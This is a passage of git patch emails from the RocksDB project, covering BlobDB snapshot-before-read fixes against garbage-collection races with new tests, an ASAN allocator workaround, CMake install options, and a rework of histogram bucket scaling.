BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { CloseSeqWrite(bfile, false /*abort*/); } @@ -2296,6 +2308,8 @@ Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, GCStats* gc_stats) { return GCFileAndUpdateLSM(bfile, gc_stats); } + +void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); } #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 6247fa22b79..0808349520e 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -261,10 +261,14 @@ class BlobDBImpl : public BlobDB { std::vector> TEST_GetBlobFiles() const; + std::vector> TEST_GetObsoleteFiles() const; + void TEST_CloseBlobFile(std::shared_ptr& bfile); Status TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, GCStats* gc_stats); + + void TEST_RunGC(); #endif // !NDEBUG private: @@ -291,7 +295,7 @@ class BlobDBImpl : public BlobDB { // tt - current time // last_id - the id of the non-TTL file to evict bool ShouldGCFile(std::shared_ptr bfile, uint64_t now, - uint64_t last_id, std::string* reason); + bool is_oldest_simple_blob_file, std::string* reason); // collect all the blob log files from the blob directory Status GetAllLogFiles(std::set>* file_nums); @@ -403,13 +407,12 @@ class BlobDBImpl : public BlobDB { bool FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, uint64_t blob_offset, uint64_t blob_size); - void CopyBlobFiles(std::vector>* bfiles_copy, - uint64_t* last_id); + void CopyBlobFiles(std::vector>* bfiles_copy); void FilterSubsetOfFiles( const std::vector>& blob_files, std::vector>* to_process, uint64_t epoch, - uint64_t last_id, size_t files_to_collect); + size_t files_to_collect); uint64_t EpochNow() { return env_->NowMicros() / 1000000; } @@ -445,7 +448,7 @@ class BlobDBImpl : public BlobDB { // Read Write Mutex, which protects all the data structures // HEAVILY TRAFFICKED - port::RWMutex mutex_; + mutable port::RWMutex mutex_; // Writers has to hold write_mutex_ before writing. mutable port::Mutex write_mutex_; @@ -454,7 +457,7 @@ class BlobDBImpl : public BlobDB { std::atomic next_file_number_; // entire metadata of all the BLOB files memory - std::unordered_map> blob_files_; + std::map> blob_files_; // epoch or version of the open files. std::atomic epoch_of_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index be42c395b9d..4b742157ea7 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -688,6 +688,41 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { VerifyDB({{"foo", "v2"}}); } +TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { + // Use mock env to stop wall clock. + Options options; + options.env = mock_env_.get(); + BlobDBOptions bdb_options; + bdb_options.blob_dir_size = 100; + bdb_options.blob_file_size = 100; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + std::string value(100, 'v'); + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key_with_ttl", value, 60)); + for (int i = 0; i < 10; i++) { + ASSERT_OK(blob_db_->Put(WriteOptions(), "key" + ToString(i), value)); + } + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(11, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + ASSERT_TRUE(blob_files[0]->Immutable()); + blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + for (int i = 1; i <= 10; i++) { + ASSERT_FALSE(blob_files[i]->HasTTL()); + if (i < 10) { + ASSERT_TRUE(blob_files[i]->Immutable()); + } + } + blob_db_impl->TEST_RunGC(); + // The oldest simple blob file (i.e. blob_files[1]) has been selected for GC. + auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + ASSERT_EQ(1, obsolete_files.size()); + ASSERT_EQ(blob_files[1]->BlobFileNumber(), + obsolete_files[0]->BlobFileNumber()); +} + } // namespace blob_db } // namespace rocksdb From 5b68b114f1038180f1ead4b8abd45fa1d92ffa30 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Sun, 20 Aug 2017 18:12:38 -0700 Subject: [PATCH 134/205] Blob db create a snapshot before every read Summary: If GC kicks in between * A Get() reads index entry from base db. * The Get() read from a blob file The GC can delete the corresponding blob file, making the key not found. Fortunately we have existing logic to avoid deleting a blob file if it is referenced by a snapshot. So the fix is to explicitly create a snapshot before reading index entry from base db. Closes https://github.com/facebook/rocksdb/pull/2754 Differential Revision: D5655956 Pulled By: yiwu-arbug fbshipit-source-id: e4ccbc51331362542e7343175bbcbdea5830f544 --- utilities/blob_db/blob_db_impl.cc | 100 +++++++++++++++++++++--------- utilities/blob_db/blob_db_impl.h | 43 ++++++++++--- utilities/blob_db/blob_db_test.cc | 92 +++++++++++++++++++++++++++ 3 files changed, 197 insertions(+), 38 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 6939e73aaff..d787529b1da 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -305,8 +305,8 @@ void BlobDBImpl::StartBackgroundTasks() { kDeleteCheckPeriodMillisecs, std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); tqueue_.add( - kDeleteObsoletedFilesPeriodMillisecs, - std::bind(&BlobDBImpl::DeleteObsFiles, this, std::placeholders::_1)); + kDeleteObsoleteFilesPeriodMillisecs, + std::bind(&BlobDBImpl::DeleteObsoleteFiles, this, std::placeholders::_1)); tqueue_.add(kSanityCheckPeriodMillisecs, std::bind(&BlobDBImpl::SanityCheck, this, std::placeholders::_1)); tqueue_.add(kWriteAmplificationStatsPeriodMillisecs, @@ -1117,15 +1117,25 @@ Status BlobDBImpl::AppendSN(const std::shared_ptr& bfile, } std::vector BlobDBImpl::MultiGet( - const ReadOptions& options, + const ReadOptions& read_options, const std::vector& column_family, const std::vector& keys, std::vector* values) { + // Get a snapshot to avoid blob file get deleted between we + // fetch and index entry and reading from the file. + ReadOptions ro(read_options); + bool snapshot_created = SetSnapshotIfNeeded(&ro); std::vector values_lsm; values_lsm.resize(keys.size()); - auto statuses = db_->MultiGet(options, column_family, keys, &values_lsm); + auto statuses = db_->MultiGet(ro, column_family, keys, &values_lsm); + TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:1"); + TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:2"); + values->resize(keys.size()); + assert(statuses.size() == keys.size()); for (size_t i = 0; i < keys.size(); ++i) { - if (!statuses[i].ok()) continue; + if (!statuses[i].ok()) { + continue; + } auto cfh = reinterpret_cast(column_family[i]); auto cfd = cfh->cfd(); @@ -1133,9 +1143,21 @@ std::vector BlobDBImpl::MultiGet( Status s = CommonGet(cfd, keys[i], values_lsm[i], &((*values)[i])); statuses[i] = s; } + if (snapshot_created) { + db_->ReleaseSnapshot(ro.snapshot); + } return statuses; } +bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { + assert(read_options != nullptr); + if (read_options->snapshot != nullptr) { + return false; + } + read_options->snapshot = db_->GetSnapshot(); + return true; +} + Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, const std::string& index_entry, std::string* value, SequenceNumber* sequence) { @@ -1172,11 +1194,6 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, bfile = hitr->second; } - if (bfile->Obsolete()) { - return Status::NotFound( - "Blob Not Found as blob file was garbage collected"); - } - // 0 - size if (!handle.size() && value != nullptr) { value->clear(); @@ -1274,25 +1291,30 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, return s; } -Status BlobDBImpl::Get(const ReadOptions& options, +Status BlobDBImpl::Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) { auto cfh = reinterpret_cast(column_family); auto cfd = cfh->cfd(); + // Get a snapshot to avoid blob file get deleted between we + // fetch and index entry and reading from the file. + // TODO(yiwu): For Get() retry if file not found would be a simpler strategy. + ReadOptions ro(read_options); + bool snapshot_created = SetSnapshotIfNeeded(&ro); + Status s; std::string index_entry; - s = db_->Get(options, column_family, key, &index_entry); - if (!s.ok()) { - if (debug_level_ >= 3) - ROCKS_LOG_WARN(db_options_.info_log, - "Get Failed on LSM KEY: %s status: '%s'", - key.ToString().c_str(), s.ToString().c_str()); - return s; + s = db_->Get(ro, column_family, key, &index_entry); + TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); + TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); + if (s.ok()) { + s = CommonGet(cfd, key, index_entry, value->GetSelf()); + value->PinSelf(); + } + if (snapshot_created) { + db_->ReleaseSnapshot(ro.snapshot); } - - s = CommonGet(cfd, key, index_entry, value->GetSelf()); - value->PinSelf(); return s; } @@ -1302,6 +1324,8 @@ Slice BlobDBIterator::value() const { auto cfh = reinterpret_cast(cfh_); auto cfd = cfh->cfd(); + TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:1"); + TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:2"); Status s = db_impl_->CommonGet(cfd, iter_->key(), index_entry.ToString(false), &vpart_); return Slice(vpart_); @@ -1977,7 +2001,7 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, return false; } -std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { +std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { if (aborted) return std::make_pair(false, -1); { @@ -2002,6 +2026,7 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { } } + blob_files_.erase(bfile->BlobFileNumber()); Status s = env_->DeleteFile(bfile->PathName()); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, @@ -2026,7 +2051,9 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { // put files back into obsolete if for some reason, delete failed if (!tobsolete.empty()) { WriteLock wl(&mutex_); - for (auto bfile : tobsolete) obsolete_files_.push_front(bfile); + for (auto bfile : tobsolete) { + obsolete_files_.push_front(bfile); + } } return std::make_pair(!aborted, -1); @@ -2212,8 +2239,6 @@ std::pair BlobDBImpl::RunGC(bool aborted) { WriteLock wl(&mutex_); for (auto bfile : obsoletes) { bool last_file = (bfile == obsoletes.back()); - // remove from global list so writers - blob_files_.erase(bfile->BlobFileNumber()); if (!evict_cb) { bfile->SetCanBeDeleted(); @@ -2231,10 +2256,14 @@ std::pair BlobDBImpl::RunGC(bool aborted) { return std::make_pair(true, -1); } -Iterator* BlobDBImpl::NewIterator(const ReadOptions& opts, +Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options, ColumnFamilyHandle* column_family) { - return new BlobDBIterator(db_->NewIterator(opts, column_family), - column_family, this); + // Get a snapshot to avoid blob file get deleted between we + // fetch and index entry and reading from the file. + ReadOptions ro(read_options); + bool snapshot_created = SetSnapshotIfNeeded(&ro); + return new BlobDBIterator(db_->NewIterator(ro, column_family), column_family, + this, snapshot_created, ro.snapshot); } Status DestroyBlobDB(const std::string& dbname, const Options& options, @@ -2283,6 +2312,7 @@ Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, } std::vector> BlobDBImpl::TEST_GetBlobFiles() const { + ReadLock l(&mutex_); std::vector> blob_files; for (auto& p : blob_files_) { blob_files.emplace_back(p.second); @@ -2300,6 +2330,10 @@ std::vector> BlobDBImpl::TEST_GetObsoleteFiles() return obsolete_files; } +void BlobDBImpl::TEST_DeleteObsoleteFiles() { + DeleteObsoleteFiles(false /*abort*/); +} + void BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { CloseSeqWrite(bfile, false /*abort*/); } @@ -2310,6 +2344,16 @@ Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, } void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); } + +void BlobDBImpl::TEST_ObsoleteFile(std::shared_ptr& bfile) { + uint64_t number = bfile->BlobFileNumber(); + assert(blob_files_.count(number) > 0); + bfile->SetCanBeDeleted(); + { + WriteLock l(&mutex_); + obsolete_files_.push_back(bfile); + } +} #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 0808349520e..9886dbe5b21 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -200,7 +200,7 @@ class BlobDBImpl : public BlobDB { static constexpr uint32_t kReclaimOpenFilesPeriodMillisecs = 1 * 1000; // how often to schedule delete obs files periods - static constexpr uint32_t kDeleteObsoletedFilesPeriodMillisecs = 10 * 1000; + static constexpr uint32_t kDeleteObsoleteFilesPeriodMillisecs = 10 * 1000; // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; @@ -219,16 +219,16 @@ class BlobDBImpl : public BlobDB { const Slice& key) override; using rocksdb::StackableDB::Get; - Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, + Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; using rocksdb::StackableDB::NewIterator; - virtual Iterator* NewIterator(const ReadOptions& opts, + virtual Iterator* NewIterator(const ReadOptions& read_options, ColumnFamilyHandle* column_family) override; using rocksdb::StackableDB::MultiGet; virtual std::vector MultiGet( - const ReadOptions& options, + const ReadOptions& read_options, const std::vector& column_family, const std::vector& keys, std::vector* values) override; @@ -269,11 +269,19 @@ class BlobDBImpl : public BlobDB { GCStats* gc_stats); void TEST_RunGC(); + + void TEST_ObsoleteFile(std::shared_ptr& bfile); + + void TEST_DeleteObsoleteFiles(); #endif // !NDEBUG private: Status OpenPhase1(); + // Create a snapshot if there isn't one in read options. + // Return true if a snapshot is created. + bool SetSnapshotIfNeeded(ReadOptions* read_options); + Status CommonGet(const ColumnFamilyData* cfd, const Slice& key, const std::string& index_entry, std::string* value, SequenceNumber* sequence = nullptr); @@ -332,7 +340,7 @@ class BlobDBImpl : public BlobDB { // delete files which have been garbage collected and marked // obsolete. Check whether any snapshots exist which refer to // the same - std::pair DeleteObsFiles(bool aborted); + std::pair DeleteObsoleteFiles(bool aborted); // Major task to garbage collect expired and deleted blobs std::pair RunGC(bool aborted); @@ -593,7 +601,7 @@ class BlobFile { // This Read-Write mutex is per file specific and protects // all the datastructures - port::RWMutex mutex_; + mutable port::RWMutex mutex_; // time when the random access reader was last created. std::atomic last_access_; @@ -700,12 +708,23 @@ class BlobFile { class BlobDBIterator : public Iterator { public: explicit BlobDBIterator(Iterator* iter, ColumnFamilyHandle* column_family, - BlobDBImpl* impl) - : iter_(iter), cfh_(column_family), db_impl_(impl) { - assert(iter_); + BlobDBImpl* impl, bool own_snapshot, + const Snapshot* snapshot) + : iter_(iter), + cfh_(column_family), + db_impl_(impl), + own_snapshot_(own_snapshot), + snapshot_(snapshot) { + assert(iter != nullptr); + assert(snapshot != nullptr); } - ~BlobDBIterator() { delete iter_; } + ~BlobDBIterator() { + if (own_snapshot_) { + db_impl_->ReleaseSnapshot(snapshot_); + } + delete iter_; + } bool Valid() const override { return iter_->Valid(); } @@ -727,10 +746,14 @@ class BlobDBIterator : public Iterator { Status status() const override { return iter_->status(); } + // Iterator::Refresh() not supported. + private: Iterator* iter_; ColumnFamilyHandle* cfh_; BlobDBImpl* db_impl_; + bool own_snapshot_; + const Snapshot* snapshot_; mutable std::string vpart_; }; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 4b742157ea7..8ec01698aa8 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -723,6 +723,98 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { obsolete_files[0]->BlobFileNumber()); } +TEST_F(BlobDBTest, ReadWhileGC) { + // run the same test for Get(), MultiGet() and Iterator each. + for (int i = 0; i < 3; i++) { + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + blob_db_->Put(WriteOptions(), "foo", "bar"); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + std::shared_ptr bfile = blob_files[0]; + uint64_t bfile_number = bfile->BlobFileNumber(); + blob_db_impl->TEST_CloseBlobFile(bfile); + + switch (i) { + case 0: + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::Get:AfterIndexEntryGet:1", + "BlobDBTest::ReadWhileGC:1"}, + {"BlobDBTest::ReadWhileGC:2", + "BlobDBImpl::Get:AfterIndexEntryGet:2"}}); + break; + case 1: + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::MultiGet:AfterIndexEntryGet:1", + "BlobDBTest::ReadWhileGC:1"}, + {"BlobDBTest::ReadWhileGC:2", + "BlobDBImpl::MultiGet:AfterIndexEntryGet:2"}}); + break; + case 2: + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBIterator::value:BeforeGetBlob:1", + "BlobDBTest::ReadWhileGC:1"}, + {"BlobDBTest::ReadWhileGC:2", + "BlobDBIterator::value:BeforeGetBlob:2"}}); + break; + } + SyncPoint::GetInstance()->EnableProcessing(); + + auto reader = port::Thread([this, i]() { + std::string value; + std::vector values; + std::vector statuses; + switch (i) { + case 0: + ASSERT_OK(blob_db_->Get(ReadOptions(), "foo", &value)); + ASSERT_EQ("bar", value); + break; + case 1: + statuses = blob_db_->MultiGet(ReadOptions(), {"foo"}, &values); + ASSERT_EQ(1, statuses.size()); + ASSERT_EQ(1, values.size()); + ASSERT_EQ("bar", values[0]); + break; + case 2: + // VerifyDB use iterator to scan the DB. + VerifyDB({{"foo", "bar"}}); + break; + } + }); + + TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:1"); + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); + ASSERT_EQ(1, gc_stats.blob_count); + ASSERT_EQ(1, gc_stats.num_relocate); + ASSERT_EQ(1, gc_stats.relocate_succeeded); + blob_db_impl->TEST_ObsoleteFile(blob_files[0]); + blob_db_impl->TEST_DeleteObsoleteFiles(); + // The file shouln't be deleted + blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(2, blob_files.size()); + ASSERT_EQ(bfile_number, blob_files[0]->BlobFileNumber()); + auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + ASSERT_EQ(1, obsolete_files.size()); + ASSERT_EQ(bfile_number, obsolete_files[0]->BlobFileNumber()); + TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:2"); + reader.join(); + SyncPoint::GetInstance()->DisableProcessing(); + + // The file is deleted this time + blob_db_impl->TEST_DeleteObsoleteFiles(); + blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_NE(bfile_number, blob_files[0]->BlobFileNumber()); + ASSERT_EQ(0, blob_db_impl->TEST_GetObsoleteFiles().size()); + VerifyDB({{"foo", "bar"}}); + Destroy(); + } +} + } // namespace blob_db } // namespace rocksdb From 09ac6206abf27b45e6d2cbe6f462d3c3886dfc62 Mon Sep 17 00:00:00 2001 From: Archit Mishra Date: Mon, 21 Aug 2017 12:02:17 -0700 Subject: [PATCH 135/205] Circumvent ASAN false positive Summary: Changes: * checks if ASAN mode is on, and uses malloc and free in the constructor and destructor Closes https://github.com/facebook/rocksdb/pull/2767 Differential Revision: D5671243 Pulled By: armishra fbshipit-source-id: 8e4ad0f7f163400c4effa8617d3b30134119d802 --- cache/lru_cache.cc | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index a78a52dffff..47e40233648 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -234,19 +234,35 @@ void LRUCacheShard::EvictFromLRU(size_t charge, } void* LRUCacheShard::operator new(size_t size) { +#if __SANITIZE_ADDRESS__ + return malloc(size); +#else return port::cacheline_aligned_alloc(size); +#endif } void* LRUCacheShard::operator new[](size_t size) { +#if __SANITIZE_ADDRESS__ + return malloc(size); +#else return port::cacheline_aligned_alloc(size); +#endif } void LRUCacheShard::operator delete(void *memblock) { +#if __SANITIZE_ADDRESS__ + free(memblock); +#else port::cacheline_aligned_free(memblock); +#endif } void LRUCacheShard::operator delete[](void* memblock) { +#if __SANITIZE_ADDRESS__ + free(memblock); +#else port::cacheline_aligned_free(memblock); +#endif } void LRUCacheShard::SetCapacity(size_t capacity) { From f004307e9b5ff1bc9601bd08a93e452140f8c04e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Pawe=C5=82=20Bylica?= Date: Mon, 21 Aug 2017 14:41:11 -0700 Subject: [PATCH 136/205] CMake improvements Summary: - Allow setting custom installation prefix. - Add option to disable building tests. Closes https://github.com/facebook/rocksdb/pull/2195 Differential Revision: D5054239 Pulled By: sagar0 fbshipit-source-id: 2de6bef8b7eafed60a830e1796b262f9e6f79da0 --- CMakeLists.txt | 33 ++++++++++++++++++++++++--------- 1 file changed, 24 insertions(+), 9 deletions(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 0a28a7c43ae..715147291fc 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -635,6 +635,26 @@ else() message(STATUS "JNI library is disabled") endif() +# Installation and packaging +if(WIN32) + option(ROCKSDB_INSTALL_ON_WINDOWS "Enable install target on Windows" OFF) +endif() +if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS) + if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT) + if(${CMAKE_SYSTEM_NAME} STREQUAL "Linux") + # Change default installation prefix on Linux to /usr + set(CMAKE_INSTALL_PREFIX /usr CACHE PATH "Install path prefix, prepended onto install directories." FORCE) + endif() + endif() + + include(GNUInstallDirs) + install(TARGETS ${ROCKSDB_STATIC_LIB} COMPONENT devel ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}) + install(TARGETS ${ROCKSDB_SHARED_LIB} COMPONENT runtime DESTINATION ${CMAKE_INSTALL_LIBDIR}) + install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}) +endif() + +option(WITH_TESTS "build with tests" ON) +if(WITH_TESTS) set(TESTS cache/cache_test.cc cache/lru_cache_test.cc @@ -846,14 +866,9 @@ foreach(sourcefile ${C_TEST_EXES}) add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX}) add_dependencies(check ${exename}${ARTIFACT_SUFFIX}) endforeach(sourcefile ${C_TEST_EXES}) -add_subdirectory(tools) +endif() -# Installation and packaging for Linux -if(NOT WIN32) -install(TARGETS ${ROCKSDB_STATIC_LIB} COMPONENT devel ARCHIVE DESTINATION lib64) -install(TARGETS ${ROCKSDB_SHARED_LIB} COMPONENT runtime DESTINATION lib64) -install(DIRECTORY "${PROJECT_SOURCE_DIR}/include/rocksdb/" - COMPONENT devel - DESTINATION include/rocksdb) -set(CMAKE_INSTALL_PREFIX /usr) +option(WITH_TOOLS "build with tools" ON) +if(WITH_TOOLS) + add_subdirectory(tools) endif() From 867fe92e5e65ce501069aa22c538757acfaade34 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Mon, 21 Aug 2017 17:09:20 -0700 Subject: [PATCH 137/205] Scale histogram bucket size by constant factor Summary: The goal is to reduce the number of histogram buckets, particularly now that we print these histograms for each column family. I chose 1.5 as the factor. We can adjust it later to either make buckets more granular or make fewer buckets. Closes https://github.com/facebook/rocksdb/pull/2139 Differential Revision: D4872076 Pulled By: ajkr fbshipit-source-id: 87790d782a605506c3d24190a028cecbd7aa564a --- HISTORY.md | 2 ++ monitoring/histogram.cc | 53 +++++++++++++----------------------- monitoring/histogram.h | 10 +++---- monitoring/histogram_test.cc | 26 ++++++++---------- 4 files changed, 38 insertions(+), 53 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index d4478c7d3de..a40a3b8926b 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,5 +1,7 @@ # Rocksdb Change Log ## Unreleased +### Public API Change +* Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints. ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc index 083ef75fdf4..b3c01a78e08 100644 --- a/monitoring/histogram.cc +++ b/monitoring/histogram.cc @@ -23,41 +23,26 @@ namespace rocksdb { -HistogramBucketMapper::HistogramBucketMapper() - : - // Add newer bucket index here. - // Should be always added in sorted order. - // If you change this, you also need to change - // size of array buckets_ in HistogramImpl - bucketValues_( - {1, 2, 3, 4, 5, 6, - 7, 8, 9, 10, 12, 14, - 16, 18, 20, 25, 30, 35, - 40, 45, 50, 60, 70, 80, - 90, 100, 120, 140, 160, 180, - 200, 250, 300, 350, 400, 450, - 500, 600, 700, 800, 900, 1000, - 1200, 1400, 1600, 1800, 2000, 2500, - 3000, 3500, 4000, 4500, 5000, 6000, - 7000, 8000, 9000, 10000, 12000, 14000, - 16000, 18000, 20000, 25000, 30000, 35000, - 40000, 45000, 50000, 60000, 70000, 80000, - 90000, 100000, 120000, 140000, 160000, 180000, - 200000, 250000, 300000, 350000, 400000, 450000, - 500000, 600000, 700000, 800000, 900000, 1000000, - 1200000, 1400000, 1600000, 1800000, 2000000, 2500000, - 3000000, 3500000, 4000000, 4500000, 5000000, 6000000, - 7000000, 8000000, 9000000, 10000000, 12000000, 14000000, - 16000000, 18000000, 20000000, 25000000, 30000000, 35000000, - 40000000, 45000000, 50000000, 60000000, 70000000, 80000000, - 90000000, 100000000, 120000000, 140000000, 160000000, 180000000, - 200000000, 250000000, 300000000, 350000000, 400000000, 450000000, - 500000000, 600000000, 700000000, 800000000, 900000000, 1000000000}), - maxBucketValue_(bucketValues_.back()), - minBucketValue_(bucketValues_.front()) { - for (size_t i =0; i < bucketValues_.size(); ++i) { - valueIndexMap_[bucketValues_[i]] = i; +HistogramBucketMapper::HistogramBucketMapper() { + // If you change this, you also need to change + // size of array buckets_ in HistogramImpl + bucketValues_ = {1, 2}; + valueIndexMap_ = {{1, 0}, {2, 1}}; + double bucket_val = static_cast(bucketValues_.back()); + while ((bucket_val = 1.5 * bucket_val) <= static_cast(port::kMaxUint64)) { + bucketValues_.push_back(static_cast(bucket_val)); + // Extracts two most significant digits to make histogram buckets more + // human-readable. E.g., 172 becomes 170. + uint64_t pow_of_ten = 1; + while (bucketValues_.back() / 10 > 10) { + bucketValues_.back() /= 10; + pow_of_ten *= 10; + } + bucketValues_.back() *= pow_of_ten; + valueIndexMap_[bucketValues_.back()] = bucketValues_.size() - 1; } + maxBucketValue_ = bucketValues_.back(); + minBucketValue_ = bucketValues_.front(); } size_t HistogramBucketMapper::IndexForValue(const uint64_t value) const { diff --git a/monitoring/histogram.h b/monitoring/histogram.h index 6a1ebbf0489..6bf2e9e93f7 100644 --- a/monitoring/histogram.h +++ b/monitoring/histogram.h @@ -45,9 +45,9 @@ class HistogramBucketMapper { } private: - const std::vector bucketValues_; - const uint64_t maxBucketValue_; - const uint64_t minBucketValue_; + std::vector bucketValues_; + uint64_t maxBucketValue_; + uint64_t minBucketValue_; std::map valueIndexMap_; }; @@ -89,7 +89,7 @@ struct HistogramStat { std::atomic_uint_fast64_t num_; std::atomic_uint_fast64_t sum_; std::atomic_uint_fast64_t sum_squares_; - std::atomic_uint_fast64_t buckets_[138]; // 138==BucketMapper::BucketCount() + std::atomic_uint_fast64_t buckets_[109]; // 109==BucketMapper::BucketCount() const uint64_t num_buckets_; }; @@ -146,4 +146,4 @@ class HistogramImpl : public Histogram { std::mutex mutex_; }; -} // namespace rocksdb \ No newline at end of file +} // namespace rocksdb diff --git a/monitoring/histogram_test.cc b/monitoring/histogram_test.cc index 70147af7267..b4e3c981c8e 100644 --- a/monitoring/histogram_test.cc +++ b/monitoring/histogram_test.cc @@ -29,33 +29,31 @@ void PopulateHistogram(Histogram& histogram, } void BasicOperation(Histogram& histogram) { - PopulateHistogram(histogram, 1, 100, 10); + PopulateHistogram(histogram, 1, 110, 10); // fill up to bucket [70, 110) HistogramData data; histogram.Data(&data); - ASSERT_LE(fabs(histogram.Percentile(100.0) - 100.0), kIota); - ASSERT_LE(fabs(data.percentile99 - 99.0), kIota); - ASSERT_LE(fabs(data.percentile95 - 95.0), kIota); - ASSERT_LE(fabs(data.median - 50.0), kIota); - ASSERT_EQ(data.average, 50.5); // avg is acurately calculated. - ASSERT_LT(fabs(data.standard_deviation- 28.86), kIota); //sd is ~= 28.86 + ASSERT_LE(fabs(histogram.Percentile(100.0) - 110.0), kIota); + ASSERT_LE(fabs(data.percentile99 - 108.9), kIota); // 99 * 110 / 100 + ASSERT_LE(fabs(data.percentile95 - 104.5), kIota); // 95 * 110 / 100 + ASSERT_LE(fabs(data.median - 55.0), kIota); // 50 * 110 / 100 + ASSERT_EQ(data.average, 55.5); // (1 + 110) / 2 } void MergeHistogram(Histogram& histogram, Histogram& other) { PopulateHistogram(histogram, 1, 100); - PopulateHistogram(other, 101, 200); + PopulateHistogram(other, 101, 250); histogram.Merge(other); HistogramData data; histogram.Data(&data); - ASSERT_LE(fabs(histogram.Percentile(100.0) - 200.0), kIota); - ASSERT_LE(fabs(data.percentile99 - 198.0), kIota); - ASSERT_LE(fabs(data.percentile95 - 190.0), kIota); - ASSERT_LE(fabs(data.median - 100.0), kIota); - ASSERT_EQ(data.average, 100.5); // avg is acurately 